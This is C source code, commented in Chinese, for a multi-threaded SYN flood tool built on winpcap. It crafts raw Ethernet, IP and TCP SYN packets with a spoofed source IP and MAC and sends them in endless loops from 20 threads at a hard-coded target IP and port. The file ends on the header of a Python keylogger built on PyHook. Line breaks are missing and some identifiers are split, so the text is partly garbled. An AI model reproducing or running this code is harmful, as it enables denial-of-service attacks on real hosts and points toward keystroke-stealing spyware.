/*===================================================* 基于winpcap的多线程SYN Flood攻击源代码* 运行平台：WinXP，Win2k3，WinVista，Win2k8，Win7* 编译环境：VC6.0 + winpcap SDK*====================================================*/#define WIN32_LEAN_AND_MEAN#define _WSPIAPI_COUNTOF#include <windows.h>#include <winsock2.h>#include <stdio.h>#include <stdlib.h>#include <pcap.h>#include <packet32.h>#pragma comment(lib, "ws2_32.lib")#pragma comment(lib, "wpcap.lib")#pragma comment(lib, "packet.lib")#define MAXTHREAD 20#define OID_802_3_CURRENT_ADDRESS 0x01010102#define OPTION_LENTH 6#define SYN_DEST_IP "192.168.0.22" // 被攻击的IP#define SYN_DEST_PORT 80 // 被攻击的PORT #define FAKE_IP "192.168.0.11" // 伪装的IP#define FAKE_MAC "\xB8\xAC\x6F\x1F\x26\xF6" // 伪装的MAC// 内存对齐设置必须是1#pragma pack(1)typedef struct et_header // 以太网首部{unsigned char eh_dst[6]; // 目的MACunsigned char eh_src[6]; // 源MACunsigned short eh_type; // 上层协议类型}ET_HEADER;typedef struct ip_hdr // IP首部{unsigned char h_verlen; // 版本与首部长度unsigned char tos; // 区分服务unsigned short total_len; // 总长度unsigned short ident; // 标识unsigned short frag_and_flags; // 3位的标志与13位的片偏移unsigned char ttl; // 生存时间unsigned char proto; // 协议unsigned short checksum; // 首部校验和unsigned int sourceIP; // 源IPunsigned int destIP; // 目的IP}IP_HEADER;typedef struct tcp_hdr // TCP首部{unsigned short th_sport; // 16位源端口unsigned short th_dport; // 16位目的端口unsigned int th_seq; // 32位序列号unsigned int th_ack; // 32位确认号unsigned short th_data_flag; // 16位标志位unsigned short th_win; // 16位窗口大小unsigned short th_sum; // 16位校验和unsigned short th_urp; // 16位紧急数据偏移量unsigned int option[OPTION_LENTH];}TCP_HEADER;typedef struct psd_hdr // TCP伪首部{unsigned long saddr; // 源地址unsigned long daddr; // 目的地址char mbz;char ptcl; // 协议类型unsigned short tcpl; // TCP长度}PSD_HEADER;typedef struct _SYN_PACKET // 最终SYN包结构{ET_HEADER eth; // 以太网头部IP_HEADER iph; // arp数据包头部TCP_HEADER tcph; // tcp数据包头部}SYN_PACKET;#pragma pack()typedef struct _PARAMETERS // 传递给线程的参数体{unsigned int srcIP;unsigned int dstIP;unsigned short dstPort;unsigned char* srcmac;unsigned char dstmac[6];pcap_t* adhandle;}PARAMETERS, *LPPARAMETERS;// 获得网卡的MAC地址unsigned char* GetSelfMac(char* pDevName){static u_char mac[6];memset(mac, 0, sizeof(mac));LPADAPTER lpAdapter = PacketOpenAdapter(pDevName);if (!lpAdapter || (lpAdapter->hFile == INV ALID_HANDLE_VALUE)){return NULL;}PPACKET_OID_DA TA OidData =(PPACKET_OID_DA TA)malloc(6 + sizeof(PACKET_OID_DATA));if (OidData == NULL){PacketCloseAdapter(lpAdapter);return NULL;}OidData->Oid = OID_802_3_CURRENT_ADDRESS;OidData->Length = 6;memset(OidData->Data, 0, 6);BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);if(Status){memcpy(mac,(u_char*)(OidData->Data),6);}free(OidData);PacketCloseAdapter(lpAdapter);return mac;}// 计算校验和unsigned short CheckSum(unsigned short * buffer, int size){unsigned long cksum = 0;while (size > 1){cksum += *buffer++;size -= sizeof(unsigned short);}if (size){cksum += *(unsigned char *) buffer;}cksum = (cksum >> 16) + (cksum & 0xffff);cksum += (cksum >> 16);return (unsigned short) (~cksum);}// 封装ARP请求包void BuildSYNPacket(SYN_PACKET &packet,unsigned char* source_mac,unsigned char* dest_mac,unsigned long srcIp,unsigned long destIp,unsigned short dstPort){PSD_HEADER PsdHeader;// 定义以太网头部memcpy(packet.eth.eh_dst, dest_mac, 6);memcpy(packet.eth.eh_src, source_mac, 6);packet.eth.eh_type = htons(0x0800); // ARP协议类型值为0x0800 // 定义IP头packet.iph.h_verlen = 0;packet.iph.h_verlen = ((4<<4)| sizeof(IP_HEADER)/sizeof(unsigned int));packet.iph.tos = 0;packet.iph.total_len= htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));packet.iph.ident = 1;packet.iph.frag_and_flags = htons(1<<14);packet.iph.ttl = 128;packet.iph.proto = IPPROTO_TCP;packet.iph.checksum = 0;packet.iph.sourceIP = srcIp;packet.iph.destIP = destIp;// 定义TCP头packet.tcph.th_sport= htons(rand()%60000 + 1024);packet.tcph.th_dport= htons(dstPort);packet.tcph.th_seq = htonl(rand()%900000000 + 100000);packet.tcph.th_ack = 0;packet.tcph.th_data_flag = 0;packet.tcph.th_data_flag = (11<<4|2<<8);packet.tcph.th_win = htons(512);packet.tcph.th_sum = 0;packet.tcph.th_urp = 0;packet.tcph.option[0] = htonl(0X020405B4);packet.tcph.option[1] = htonl(0x01030303);packet.tcph.option[2] = htonl(0x0101080A);packet.tcph.option[3] = htonl(0x00000000);packet.tcph.option[4] = htonl(0X00000000);packet.tcph.option[5] = htonl(0X01010402);// 构造伪头部PsdHeader.saddr = srcIp;PsdHeader.daddr = packet.iph.destIP;PsdHeader.mbz = 0;PsdHeader.ptcl = IPPROTO_TCP;PsdHeader.tcpl = htons(sizeof(TCP_HEADER));BYTE Buffer[sizeof(PsdHeader)+sizeof(TCP_HEADER)] = {0};memcpy(Buffer, &PsdHeader, sizeof(PsdHeader));memcpy(Buffer + sizeof(PsdHeader), &packet.tcph, sizeof(TCP_HEADER));packet.tcph.th_sum = CheckSum((unsigned short *)Buffer,sizeof(PsdHeader) + sizeof(TCP_HEADER));memset(Buffer, 0, sizeof(Buffer));memcpy(Buffer, &packet.iph, sizeof(IP_HEADER));packet.iph.checksum = CheckSum((unsigned short *)Buffer, sizeof(IP_HEADER));return;}// 发包线程函数DWORD WINAPI SYNFloodThread(LPVOID lp){PARAMETERS param;param = *((LPPARAMETERS)lp);Sleep(10);while(true){SYN_PACKET packet;BuildSYNPacket(packet, param.srcmac, param.dstmac,param.srcIP, param.dstIP, param.dstPort);if (pcap_sendpacket(param.adhandle,(const unsigned char*)&packet,sizeof(packet))==-1){fprintf(stderr, "pcap_sendpacket error.\n");}}return 1;}int main(int argc,char* argv[]){unsigned long fakeIp = inet_addr(FAKE_IP); // 要伪装成的IP地址if (fakeIp == INADDR_NONE){fprintf(stderr,"Invalid IP: %s\n", FAKE_IP);return -1;}unsigned long destIp = inet_addr(SYN_DEST_IP); // 目的IPif (destIp == INADDR_NONE){fprintf(stderr,"Invalid IP: %s\n",SYN_DEST_IP);return -1;}unsigned short dstPort = SYN_DEST_PORT; // 目的端口if (dstPort < 0 || dstPort > 65535){fprintf(stderr,"InvalidPort: %d\n", SYN_DEST_PORT);return -1;}pcap_if_t *alldevs; // 全部网卡列表pcap_if_t *d; // 一个网卡pcap_addr_t *pAddr; // 网卡地址char errbuf[PCAP_ERRBUF_SIZE]; // 错误缓冲区if (pcap_findalldevs(&alldevs, errbuf) == -1) // 获得本机网卡列表{fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);exit(1);}int i = 0;for (d = alldevs; d; d = d->next){printf("%d", ++i);if (d->description)printf(". %s\n", d->description);elseprintf(". No description available\n");}if (i == 0){fprintf(stderr, "\nNo interfaces found!\n");return -1;}printf("Enter the interface number (1-%d):", i);int inum;scanf("%d", &inum); // 用户选择的网卡序号if(inum < 1 || inum > i){printf("\nInterface number out of range.\n");pcap_freealldevs(alldevs);return -1;}HANDLE threadhandle[MAXTHREAD];PARAMETERS param;// 设置目的MAC地址memcpy(param.dstmac, FAKE_MAC, 6);// 填充线程的参数体param.dstIP = destIp;param.srcIP = fakeIp;param.dstPort = dstPort;// 移动指针到用户选择的网卡for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);param.srcmac = GetSelfMac(d->name);printf("发送SYN包，本机(%.2X-%.2X-%.2X-%.2X-%.2X-%.2X) 试图伪装成%s\n", param.srcmac[0],param.srcmac[1],param.srcmac[2],param.srcmac[3],param.srcmac[4],param.srcmac[5], FAKE_IP);if ((param.adhandle= pcap_open_live(d->name, 65536, 0, 1000, errbuf)) == NULL) {fprintf(stderr,"\nUnable to open adapter.\n");pcap_freealldevs(alldevs);return -1;}pAddr = d->addresses;while (pAddr){// 创建多线程for (int i = 0; i < MAXTHREAD; i++){threadhandle[i] =CreateThread(NULL, 0, SYNFloodThread, (void *)&param, 0, NULL);if(!threadhandle){printf("CreateThread error: %d\n",GetLastError());}Sleep(100);}pAddr = pAddr->next;}printf("退出请输入q或者Q！\n");char cQuit;do {cQuit = getchar();}while(cQuit != 'q' && cQuit != 'Q');return 0;}############################################################################## # 程序名：keylogger.py# 功能：利用Python第三方库PyHook实现键盘记录# 说明：运行平台Windows。